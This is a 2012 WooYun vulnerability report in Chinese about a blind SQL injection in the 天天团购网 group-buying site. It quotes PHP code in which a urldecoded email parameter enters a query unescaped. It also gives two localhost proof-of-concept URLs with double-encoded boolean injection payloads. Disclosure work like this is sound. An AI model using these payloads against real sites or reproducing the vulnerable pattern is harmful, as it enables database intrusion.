漏洞概要 关注数(2) 关注此漏洞
缺陷编号: WooYun-2012-03970
漏洞标题: 天天团购网盲注
相关厂商: 天天团购网
漏洞作者: kobin97
提交时间: 2012-01-22 00:41
公开时间: 2012-01-25 00:41
漏洞类型: SQL注射漏洞
危害等级: 低
自评Rank: 4
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: php源码审核 白盒测试 php+二次编码注入 天天团购
漏洞详情
披露状态:
2012-01-22: 细节已通知厂商并且等待厂商处理中
2012-01-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
天天团购网盲注
详细说明:
当没有整合uc时,造成可以利用的盲注点
function CheckEmail(){
$email=trim(urldecode($this->Get['email']));
$this->DatabaseHandler->SetTable(TABLE_PREFIX.'system_members');
$is_exists=$this->DatabaseHandler->Select('',"email='{$email}'");
if (UCENTER) {
include_once(UC_CLIENT_ROOT . './client.php');
$check_result = uc_user_checkemail($email);
if ($check_result < 1) {
echo '1';exit;
}
}
if($is_exists!=false) {
echo '1';
} else {
echo '0';
}
可以看出
urldecode 解码可以绕过GPC。
当没有整合UC时,存在输出0,不存在输出 1,造成盲入,同文件username的检查也同样存在这样的漏洞。
漏洞证明:
http://localhost:889/tt/ajax.php?mod=check&code=email&email=asdfs%2527%20or%201=1%23
http://localhost:889/tt/ajax.php?mod=check&code=email&email=asdfs%2527%20or%201=2%23
修复方案:
您懂得!
版权声明:转载请注明来源 kobin97@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-01-25 00:41
厂商回复:
漏洞Rank:5 (WooYun评价)
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值